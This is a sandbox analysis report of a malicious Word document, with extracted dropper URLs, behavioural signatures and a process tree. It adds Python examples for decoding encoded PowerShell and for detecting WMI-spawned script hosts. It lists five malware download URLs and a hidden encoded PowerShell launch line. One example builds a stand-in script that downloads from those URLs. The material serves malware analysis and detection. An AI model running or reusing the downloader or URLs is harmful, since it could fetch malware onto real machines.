Analysis

max time kernel: 30s
resource: win10v191014
submitted: 27-01-2020 23:26

Task: task1
Sample: c977f103e7ab73796c20a40a7f8a156f909dafcd005353990bf2ef2dfa6ccd7f.doc
Resource: win10v191014
0 signatures
General

Target: c977f103e7ab73796c20a40a7f8a156f909dafcd005353990bf2ef2dfa6ccd7f.doc
Sample: 200127-93afhw2q12
SHA256: c977f103e7ab73796c20a40a7f8a156f909dafcd005353990bf2ef2dfa6ccd7f
Score: 10/10
Malware Config

Extracted
Language: ps1

Source URLs
type         URL
exe.dropper  http://camnangtrithuc.com/wp-admin/rysO51/
exe.dropper  http://srgasia.com.my/wp-content/vmcG8715/
exe.dropper  https://www.amedspor.com.tr/trsss/2aCO1Gkwg/
exe.dropper  https://uklid.ir/cgi-bin/8v/
exe.dropper  https://bffanmiefan.tk/cgi-bin/wYvv84846/
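The extracted config above comes out of the PowerShell launch line recorded later in this report (Powershell -w hidden -en <base64>): the -en argument is the script as UTF-16LE text, base64 encoded, and the five dropper URLs are the download locations inside that script. The page does not reproduce the encoded payload itself, so the following is an added example, not sandbox tooling or anything recovered from the sample: it builds a constructed stand-in payload from the five URLs listed above, then shows the switch matching, decoding and URL extraction a config extractor performs. The script body used to build the stand-in is an assumption; the switch-prefix behaviour is what the report's own -en spelling demonstrates.

```python
"""Decode a PowerShell -EncodedCommand launch line and list the URLs in it.

Added example for this report, not sandbox code. The report's own -en
payload is redacted, so SAMPLE_SCRIPT below is a CONSTRUCTED stand-in that
carries the five URLs the report extracted.
"""
import base64
import re
from typing import List, Optional

# URLs listed under "Malware Config" in the report.
REPORT_URLS = [
    "http://camnangtrithuc.com/wp-admin/rysO51/",
    "http://srgasia.com.my/wp-content/vmcG8715/",
    "https://www.amedspor.com.tr/trsss/2aCO1Gkwg/",
    "https://uklid.ir/cgi-bin/8v/",
    "https://bffanmiefan.tk/cgi-bin/wYvv84846/",
]

URL_RE = re.compile(r"https?://[^\s'\"@;,)]+")


def encode_command(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects it:
    UTF-16LE bytes, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def find_encoded_payload(cmdline: str) -> Optional[str]:
    """Return the token that follows an -EncodedCommand style switch.

    powershell.exe documents -EncodedCommand, -e and -ec, and (as the -en in
    this report shows) accepts prefixes in between, so match on prefix rather
    than on one fixed spelling.
    """
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok[:1] not in "-/":
            continue
        switch = tok[1:].lower()
        if switch == "ec" or (switch and "encodedcommand".startswith(switch)):
            return tokens[i + 1]
    return None


def decode_payload(b64: str) -> str:
    """Reverse encode_command(); raises on a token that is not valid base64
    or does not decode as UTF-16LE."""
    return base64.b64decode(b64, validate=True).decode("utf-16-le")


def extract_urls(cmdline: str) -> List[str]:
    """Decode the encoded command, if present, and return its http(s) URLs
    in first-seen order (empty list when nothing decodable is found)."""
    payload = find_encoded_payload(cmdline)
    if payload is None:
        return []
    try:
        script = decode_payload(payload)
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return []
    seen: List[str] = []
    for url in URL_RE.findall(script):
        if url not in seen:
            seen.append(url)
    return seen


# CONSTRUCTED stand-in for the redacted payload: a "try each URL until one
# download succeeds" loop with the report's URLs joined by '@'. This is an
# assumption about the script's shape, not the sample's actual code.
SAMPLE_SCRIPT = (
    "$u='" + "@".join(REPORT_URLS) + "'.Split('@');"
    "foreach($x in $u){try{(New-Object Net.WebClient).DownloadFile($x,"
    "$env:TEMP+'\\a.exe');break}catch{}}"
)
SAMPLE_CMDLINE = "Powershell -w hidden -en " + encode_command(SAMPLE_SCRIPT)

if __name__ == "__main__":
    for url in extract_urls(SAMPLE_CMDLINE):
        print(url)
```

The decoder validates the base64 strictly and decodes as UTF-16LE, so a switch argument that merely looks like a word (for example the value after -ExecutionPolicy) is rejected rather than producing garbage; a real extractor would additionally handle the nested layers (a second -EncodedCommand, or a compressed string inside the script) that this stand-in does not contain.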
Signatures

Process spawned unexpected child process (1 IoC)
Processes:
description                                                                          pid   pid_target  process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process   4040  4916        Powershell.exe
wmiprvse.exe is the WMI Provider Host. A script host whose parent is wmiprvse.exe rather than WINWORD.EXE is the process tree left behind when a document launches its payload through WMI (Win32_Process.Create) instead of a direct shell call; a parent/child rule keyed only on WINWORD.EXE would not see this PowerShell launch.

Checks processor information in registry (2 TTPs, 2 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes:
description         ioc                                                                     process
Key opened          \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0        WINWORD.EXE
Key value queried   \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz   WINWORD.EXE

Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes:
description         ioc                                                                     process
Key opened          \REGISTRY\MACHINE\Hardware\Description\System\BIOS                      WINWORD.EXE
Key value queried   \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily         WINWORD.EXE
Key value queried   \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU            WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener (1 IoC)
Processes:
pid   process
4812  WINWORD.EXE

Suspicious use of SetWindowsHookEx (1 IoC)
Processes:
pid   process
4812  WINWORD.EXE
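Two of the signatures above are the ones worth turning into detection logic: a script host whose parent is wmiprvse.exe (not WINWORD.EXE), and an Office process reading the CentralProcessor\0 and BIOS keys. The following added example, not part of the sandbox or its signature set, runs those checks plus a hidden-window encoded-PowerShell check over a handful of constructed events. The Sysmon-style field names (Image, ParentImage, CommandLine, TargetObject) and the events themselves are assumptions modelled on this report's process tree and IoCs; the registry events are written in the "key opened / value queried" shape the report uses, which is API-hook telemetry from the sandbox, not something Sysmon's registry events (create, set, rename) would give you on a production endpoint.

```python
"""Detection checks for the behaviours flagged in this report, applied to
constructed sample events. Added example; the field names and the events
are assumptions, not data taken from the report."""
import re
from typing import Dict, List

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
# Registry paths WINWORD.EXE read in this report (compared case-insensitively).
FINGERPRINT_PATHS = (
    r"\hardware\description\system\centralprocessor\0",
    r"\hardware\description\system\bios",
)
# "-e/-en/-enc/-ec <base64>" and "-w/-win/-windowstyle hidden"
ENCODED_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|n\w*)?\s+[A-Za-z0-9+/]{16,}={0,2}")
HIDDEN_RE = re.compile(r"(?i)(?:^|\s)-w(?:i\w*)?\s+hidden\b")


def image_name(path: str) -> str:
    """Basename of an image path, lower-cased."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process_create(ev: Dict[str, str]) -> List[str]:
    """Alerts for one process-creation event."""
    alerts: List[str] = []
    child = image_name(ev["Image"])
    parent = image_name(ev["ParentImage"])
    cmd = ev.get("CommandLine", "")
    if child in SCRIPT_HOSTS and parent == "wmiprvse.exe":
        # The WMI Provider Host spawning a script host is the trace left when
        # a macro launches via Win32_Process.Create: the Office parent is absent.
        alerts.append(f"{parent} spawned {child}: script host launched via WMI")
    if child in SCRIPT_HOSTS and parent in OFFICE:
        alerts.append(f"{parent} spawned {child}: Office process launched a script host")
    if child in {"powershell.exe", "pwsh.exe"} and ENCODED_RE.search(cmd) and HIDDEN_RE.search(cmd):
        alerts.append(f"{child} run hidden with an encoded command")
    return alerts


def check_registry_query(ev: Dict[str, str]) -> List[str]:
    """Alerts for one 'key opened' / 'value queried' event."""
    proc = image_name(ev["Image"])
    target = ev["TargetObject"].lower()
    if proc in OFFICE and any(p in target for p in FINGERPRINT_PATHS):
        return [f"{proc} read hardware fingerprint key {ev['TargetObject']}"]
    return []


def run(events: List[Dict[str, str]]) -> List[str]:
    """Dispatch each event to the matching check and collect the alerts."""
    out: List[str] = []
    for ev in events:
        if ev["Type"] == "ProcessCreate":
            out.extend(check_process_create(ev))
        elif ev["Type"] == "RegistryQuery":
            out.extend(check_registry_query(ev))
    return out


WINWORD = r"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe"

# CONSTRUCTED events modelled on the report's process tree and registry IoCs.
# The base64 blob stands in for the redacted -en payload.
SAMPLE_EVENTS = [
    {"Type": "ProcessCreate", "Image": WINWORD, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": '"WINWORD.EXE" /n "sample.doc" /o ""'},
    {"Type": "RegistryQuery", "Image": WINWORD,
     "TargetObject": r"\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz"},
    {"Type": "RegistryQuery", "Image": WINWORD,
     "TargetObject": r"\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU"},
    {"Type": "ProcessCreate", "Image": PS, "ParentImage": r"C:\Windows\system32\wbem\wmiprvse.exe",
     "CommandLine": "Powershell -w hidden -en QQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQA="},
    # Benign controls: an interactive PowerShell and a non-Office CPU lookup.
    {"Type": "ProcessCreate", "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -NoProfile -Command Get-Date"},
    {"Type": "RegistryQuery", "Image": r"C:\Windows\System32\svchost.exe",
     "TargetObject": r"\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz"},
]

if __name__ == "__main__":
    for line in run(SAMPLE_EVENTS):
        print(line)
```

On the constructed events this yields four alerts: two fingerprint reads by WINWORD.EXE, the wmiprvse.exe parent, and the hidden encoded command line, while the interactive PowerShell and the svchost.exe CPU lookup stay quiet. The WMI check is the important one for this sample; the Office-parent check is kept alongside it because it is the rule most teams already have, and the report shows why it is not sufficient on its own.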
Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
  "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\c977f103e7ab73796c20a40a7f8a156f909dafcd005353990bf2ef2dfa6ccd7f.doc" /o ""
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  PID: 4812

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
  Powershell -w hidden -en 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
  - Process spawned unexpected child process
  PID: 4040